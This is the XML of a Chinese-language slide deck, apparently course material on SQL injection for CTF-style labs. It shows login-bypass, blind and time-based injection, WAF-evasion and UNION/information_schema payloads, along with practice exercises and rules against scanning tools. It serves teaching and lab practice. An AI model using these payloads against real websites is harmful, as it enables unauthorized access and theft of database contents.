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4F1B48-2E0B-4DC5-B8BF-B135CF244B69}">
  <a:tblStyle styleId="{074F1B48-2E0B-4DC5-B8BF-B135CF244B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3849cb1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3849cb1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93849cb1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93849cb1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3849cb1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3849cb1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93849cb1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93849cb1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3849cb1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93849cb1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93849cb1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93849cb1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93849cb1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93849cb1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93849cb1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93849cb1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93849cb1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93849cb1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93849cb1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93849cb1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3849cb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3849cb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93849cb14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93849cb14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93849cb1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93849cb1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3849cb1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3849cb1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93849cb14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93849cb14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93849cb14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93849cb14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93849cb14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93849cb14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93849cb14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93849cb14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93849cb14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93849cb14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3849cb1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3849cb1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93849cb1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93849cb1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3849cb1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3849cb1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3849cb1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93849cb1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3849cb1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93849cb1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3849cb1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93849cb1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93849cb1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93849cb1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e.zongyuan.nctu.me/sqlinject/sql.ph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log.gtwang.org/programming/python-requests-module-tutorial/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.runoob.com/python/att-string-find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w181496/Web-CTF-Cheatsheet#sqlite" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://los.eagle-jump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.zongyuan.nctu.me/sqlinject/demo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web - sql injection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yuan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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>的註解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一般 sql 註解可以分為下面幾種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--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/*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一個 */ 可以閉合前面多個 /* 語句在後面有放註解時可以使用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#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由於 # 在 web 有特殊的意義 (Browser Fragment)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要用 Url Encode =&gt; %23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限制所選取的資料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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select id from user_table where id='guest' and password='' or 1 = 1 --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只會回傳第零筆資料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952500" y="32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{074F1B48-2E0B-4DC5-B8BF-B135CF244B69}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guest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xxxxx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xxxxx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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295050" y="3711600"/>
            <a:ext cx="558300" cy="31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LIMIT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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select id from user_table where id='guest' and password='' or 1 = 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>limit 1,1</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--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會回傳第一筆資料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200" name="Google Shape;200;p24"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="952500" y="32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{074F1B48-2E0B-4DC5-B8BF-B135CF244B69}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guest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xxxxx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xxxxx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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="326900" y="4080525"/>
            <a:ext cx="558300" cy="31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Blind sql injection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有時候資料庫查詢不會顯⽰任何資料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例如：一般介面只會顯示登入成功或是失敗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 true/false 回傳去判斷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b="1"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= 'admin' and ascii(mid(password, 1, 1))&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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</a:t>
            </a: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TRUE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b="1"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= 'admin' and ascii(mid(password, 1, 1))&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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b="1"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</a:t>
            </a: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FALSE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沒有回傳可以透過時間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b="1"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= 'admin' and if(ascii(mid(password,1,1))&gt;0, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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sleep(5)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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1)=1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MySQL Bypass WAF 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MYSQL　對　大小寫不敏感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空白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/**/,%09, %0a, %0b, %0c, %0d, %a0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OR(1=1)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OR	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800"/>
              <a:t>=&gt;	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800"/>
              <a:t>||  ， AND =&gt; &amp;&amp;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= 	=&gt;	 LIKE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LIMIT 0,1 	=&gt; 	LIMIT 1 OFFSET 0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1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嘗試通過 SELECT 判斷，拿到 admin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有擋一些字，找東西去繞過他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https://me.zongyuan.nctu.me/sqlinject/sql.php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2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使用 Blind sql injection 去 leak admin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密碼長度有點多，可以嘗試寫一個腳本爆破他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python 是個好東西!!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https://blog.gtwang.org/programming/python-requests-module-tutorial/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https://www.runoob.com/python/att-string-find.html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禁止使用開源的工具去掃描，ex : sqlmap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137" y="208225"/>
            <a:ext cx="3549725" cy="47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UNION SELECT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對資料庫做聯集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SELECT * FROM user WHERE id=’admin’ UNION SELECT 1,2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SELECT 的 type 要一致(MySQL 會自動轉型)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猜出TYPE(戳他) 或是 NULL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39" name="Google Shape;239;p30"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="952500" y="343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{074F1B48-2E0B-4DC5-B8BF-B135CF244B69}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paddword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xxxxxx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30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="362625" y="3880625"/>
            <a:ext cx="488400" cy="28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顯示自己的 UNION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前面給一個錯誤的查詢即可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SELECT * FROM user WHERE id=’bbb’ UNION SELECT 1,2</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="247" name="Google Shape;247;p31"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="952500" y="36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{074F1B48-2E0B-4DC5-B8BF-B135CF244B69}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網站前後端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前端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html，css，javascript - 前端三本柱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後端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php，node.js，go …... 等等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甚至 python 也可以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資料庫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724" y="2227950"/>
            <a:ext cx="3544525" cy="26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特殊的 function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@@version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同version()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回傳資料庫版本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user()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zh-TW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回傳使用者名稱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特殊的資料庫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819150" y="1731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SQL 會有內建的資料庫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information_schema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他會去儲存資料庫內部的資訊，例如 : 所有的 table name，column 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我們可以透過 leak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>information_schema </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800"/>
              <a:t>去找想要看的資料庫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再去撈自己想要的資料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information_schema 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databasename		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800"/>
              <a:t>放在	information_schema.schemata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tablename		放在	information_schema.tables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columnname 		放在	infomation_schema.columns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leak database name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UNION SELECT schema_name FROM information_schema.schemata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再透過 limit 找自己想要的資訊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leak tablename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UNION SELECT table_name FROM information_schema.tables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太多 table 不可能用 limit 找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WHERE table_schema='databasename'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leak columnname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SELECT column_name FROM information_schema.columns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太多 column不可能用 limit 找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WHERE table_name = 'tablename'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有這些資訊，就能 leak 想要的東西了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SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800"/>
              <a:t> FROM (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.)C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF00FF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3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透過 information_schema 找到其他資料庫的資料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flag 所在的資料庫名稱超明顯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有擋一些字，找東西去繞過他八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延伸閱讀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Kaibro github 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Web-CTF-Cheatsheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW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https://github.com/w181496/Web-CTF-Cheatsheet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韓國的練習網站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https://los.eagle-jump.org/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SQL, Structured Query Language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結構化查詢語言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在後端管理資料庫系統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可以對資料庫做操作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■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插入 刪除 </a:t>
            </a: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查詢</a:t>
            </a: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.......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MSSQL Oracle SQLite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前行提要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禁止使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW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SQLmap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禁止使用 web-fuzzer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禁止使用網路上公開的掃描工具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zh-TW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到時被交大 ban 掉，後果自負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禁止修改資料庫的資料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資料庫的階層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731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資料庫是有階層的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database =&gt; table =&gt; column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一般網站連進去</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800"/>
              <a:t>資料庫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800"/>
              <a:t>都有預設的 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rgbClr val="0000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mysqli_connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="00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800">
                <a:solidFill>
                  <a:srgbClr val="DD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zh-TW" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="00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800">
                <a:solidFill>
                  <a:srgbClr val="DD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"user"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="00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800">
                <a:solidFill>
                  <a:srgbClr val="DD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lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="00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800">
                <a:solidFill>
                  <a:srgbClr val="DD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"dbname"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0077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SELECT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SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800"/>
              <a:t> FROM (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.)C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800"/>
              <a:t>: 要取出 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800"/>
              <a:t>column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6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800"/>
              <a:t>: 從哪個 database 中取出的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0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800"/>
              <a:t>: 從哪個 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800"/>
              <a:t>table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800"/>
              <a:t>中取出的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FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800"/>
              <a:t>: 取出資料的條件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範例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select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id='guest' and passward = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxxxxxx'</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF00FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="167" name="Google Shape;167;p19"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1085850" y="298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{074F1B48-2E0B-4DC5-B8BF-B135CF244B69}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passward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guest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xxxxxxx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 injection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只要網站開發者對 sql 的輸入沒有做好處理，就有被害入的風險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最常見的例子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select id from user_table where id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and password=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input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輸入是我們可以控制，我們就可以控制整段 sql 語法</a:t>
            </a:r>
            <a:endParaRPr baseline="-25000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 injection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我們 password 可以輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000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' or 1 = 1 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW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用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 去閉合前方的 ' 和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>去把後方註解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select id from user_table where id='guest' and password='' or 1 = 1 -- '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demo :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https://me.zongyuan.nctu.me/sqlinject/demo.php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